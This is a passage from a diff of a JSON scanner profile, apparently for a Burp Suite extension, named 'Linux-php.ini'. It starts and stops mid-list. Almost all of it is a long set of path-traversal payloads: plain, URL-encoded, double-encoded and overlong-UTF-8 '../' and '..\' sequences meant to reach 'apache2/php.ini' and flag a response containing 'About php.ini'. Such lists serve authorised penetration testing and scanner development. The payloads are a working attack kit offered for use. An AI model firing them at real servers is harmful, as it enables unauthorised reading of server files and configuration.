c..%c0%5c..%c0%5c..%c0%5c{FILE}","..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}","%c0%2e%c0%2e\\{FILE}","%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}","%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}","%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}","%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}","%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}","%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}","%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}","%c0%2e%c0%2e%c0%5c{FILE}","%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}","%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}","%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}","%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}","%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}","%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}","%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}","///%2e%2e%2f{FILE}","///%2e%2e%2f%2e%2e%2f{FILE}","///%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","\\\\\\%2e%2e%5c{FILE}","\\\\\\%2e%2e%5c%2e%2e%5c{FILE}","\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","..//{FILE}","..//..//{FILE}","..//..//..//{FILE}","..//..//..//..//{FILE}","..//..//..//..//..//{FILE}","..//..//..//..//..//..//{FILE}","..//..//..//..//..//..//..//{FILE}","..//..//..//..//..//..//..//..//{FILE}","..///{FILE}","..///..///{FILE}","..///..///..///{FILE}","..///..///..///..///{FILE}","..///..///..///..///..///{FILE}","..///..///..///..///..///..///{FILE}","..///..///..///..///..///..///..///{FILE}","..///..///..///..///..///..///..///..///{FILE}","..\\\\{FILE}","..\\\\..\\\\{FILE}","..\\\\..\\\\..\\\\{FILE}","..\\\\..\\\\..\\\\..\\\\{FILE}","..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}","..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}","..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}","..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}","..\\\\\\{FILE}","..\\\\\\..\\\\\\{FILE}","..\\\\\\..\\\\\\..\\\\\\{FILE}","..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}","..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}","..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}","..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}","..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}","./\\/./{FILE}","./\\/././\\/./{FILE}","./\\/././\\/././\\/./{FILE}","./\\/././\\/././\\/././\\/./{FILE}","./\\/././\\/././\\/././\\/././\\/./{FILE}","./\\/././\\/././\\/././\\/././\\/././\\/./{FILE}","./\\/././\\/././\\/././\\/././\\/././\\/././\\/./{FILE}","./\\/././\\/././\\/././\\/././\\/././\\/././\\/././\\/./{FILE}",".\\/\\.\\{FILE}",".\\/\\.\\.\\/\\.\\{FILE}",".\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",".\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",".\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",".\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",".\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",".\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}","././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../{FILE}","././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../{FILE}","././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../{FILE}","././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../{FILE}","././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../{FILE}","././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../{FILE}","././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../{FILE}","././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../../{FILE}",".\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\{FILE}",".\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\{FILE}",".\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\{FILE}",".\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\{FILE}",".\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\{FILE}",".\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\..\\{FILE}",".\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\..\\..\\{FILE}",".\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\..\\..\\..\\{FILE}","./../{FILE}","./.././../{FILE}","./.././.././../{FILE}","./.././.././.././../{FILE}","./.././.././.././.././../{FILE}","./.././.././.././.././.././../{FILE}","./.././.././.././.././.././.././../{FILE}","./.././.././.././.././.././.././.././../{FILE}",".\\..\\{FILE}",".\\..\\.\\..\\{FILE}",".\\..\\.\\..\\.\\..\\{FILE}",".\\..\\.\\..\\.\\..\\.\\..\\{FILE}",".\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}",".\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}",".\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}",".\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}",".//..//{FILE}",".//..//.//..//{FILE}",".//..//.//..//.//..//{FILE}",".//..//.//..//.//..//.//..//{FILE}",".//..//.//..//.//..//.//..//.//..//{FILE}",".//..//.//..//.//..//.//..//.//..//.//..//{FILE}",".//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}",".//..//.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}",".\\\\..\\\\{FILE}",".\\\\..\\\\.\\\\..\\\\{FILE}",".\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",".\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",".\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",".\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",".\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",".\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}","../{FILE}","../..//{FILE}","../..//../{FILE}","../..//../..//{FILE}","../..//../..//../{FILE}","../..//../..//../..//{FILE}","../..//../..//../..//../{FILE}","../..//../..//../..//../..//{FILE}","..\\{FILE}","..\\..\\\\{FILE}","..\\..\\\\..\\{FILE}","..\\..\\\\..\\..\\\\{FILE}","..\\..\\\\..\\..\\\\..\\{FILE}","..\\..\\\\..\\..\\\\..\\..\\\\{FILE}","..\\..\\\\..\\..\\\\..\\..\\\\..\\{FILE}","..\\..\\\\..\\..\\\\..\\..\\\\..\\..\\\\{FILE}","..///{FILE}","../..///{FILE}","../..//..///{FILE}","../..//../..///{FILE}","../..//../..//..///{FILE}","../..//../..//../..///{FILE}","../..//../..//../..//..///{FILE}","../..//../..//../..//../..///{FILE}","..\\\\\\{FILE}","..\\..\\\\\\{FILE}","..\\..\\\\..\\\\\\{FILE}","..\\..\\\\..\\..\\\\\\{FILE}","..\\..\\\\..\\..\\\\..\\\\\\{FILE}","..\\..\\\\..\\..\\\\..\\..\\\\\\{FILE}","..\\..\\\\..\\..\\\\..\\..\\\\..\\\\\\{FILE}","..\\..\\\\..\\..\\\\..\\..\\\\..\\..\\\\\\{FILE}"],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["true,Or,About php.ini"],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":1,"RedirType":0,"MaxRedir":0,"payloadPosition":1,"payloadsFile":"","grepsFile":"","IssueName":"Linux-php.ini","IssueSeverity":"Medium","IssueConfidence":"Certain","IssueDetail":"Linux-php.ini","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","Header":[{"type":"Payload","match":"{FILE}","replace":"apache2/php.ini","regex":"String"}],"VariationAttributes":[],"InsertionPointType":[18,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127],"Scantype":0,"pathDiscovery":false}] \ No newline at end of file +[ + { + "ProfileName": "Linux-php.ini", + "Name": "", + "Enabled": true, + "Scanner": 1, + "Author": "@Sy3Omda", + "Payloads": [ + "true,../{FILE}", + "true,../../{FILE}", + "true,../../../{FILE}", + "true,../../../../{FILE}", + "true,../../../../../{FILE}", + "true,../../../../../../{FILE}", + "true,../../../../../../../{FILE}", + "true,../../../../../../../../{FILE}", + "true,..%2f{FILE}", + "true,..%2f..%2f{FILE}", + "true,..%2f..%2f..%2f{FILE}", + "true,..%2f..%2f..%2f..%2f{FILE}", + "true,..%2f..%2f..%2f..%2f..%2f{FILE}", + "true,..%2f..%2f..%2f..%2f..%2f..%2f{FILE}", + "true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}", + "true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}", + "true,%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,..%252f{FILE}", + "true,..%252f..%252f{FILE}", + "true,..%252f..%252f..%252f{FILE}", + "true,..%252f..%252f..%252f..%252f{FILE}", + "true,..%252f..%252f..%252f..%252f..%252f{FILE}", + "true,..%252f..%252f..%252f..%252f..%252f..%252f{FILE}", + "true,..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}", + "true,..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}", + "true,%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}", + "true,..\\{FILE}", + "true,..\\..\\{FILE}", + "true,..\\..\\..\\{FILE}", + "true,..\\..\\..\\..\\{FILE}", + "true,..\\..\\..\\..\\..\\{FILE}", + "true,..\\..\\..\\..\\..\\..\\{FILE}", + "true,..\\..\\..\\..\\..\\..\\..\\{FILE}", + "true,..\\..\\..\\..\\..\\..\\..\\..\\{FILE}", + "true,..%255c{FILE}", + "true,..%255c..%255c{FILE}", + "true,..%255c..%255c..%255c{FILE}", + "true,..%255c..%255c..%255c..%255c{FILE}", + "true,..%255c..%255c..%255c..%255c..%255c{FILE}", + "true,..%255c..%255c..%255c..%255c..%255c..%255c{FILE}", + "true,..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}", + "true,..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}", + "true,..%5c..%5c{FILE}", + "true,..%5c..%5c..%5c{FILE}", + "true,..%5c..%5c..%5c..%5c{FILE}", + "true,..%5c..%5c..%5c..%5c..%5c{FILE}", + "true,..%5c..%5c..%5c..%5c..%5c..%5c{FILE}", + "true,..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}", + "true,..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}", + "true,%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}", + "true,..%c0%af{FILE}", + "true,..%c0%af..%c0%af{FILE}", + "true,..%c0%af..%c0%af..%c0%af{FILE}", + "true,..%c0%af..%c0%af..%c0%af..%c0%af{FILE}", + "true,..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}", + "true,..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}", + "true,..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}", + "true,..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}", + "true,%c0%ae%c0%ae/{FILE}", + "true,%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}", + "true,%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}", + "true,%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}", + "true,%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}", + "true,%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}", + 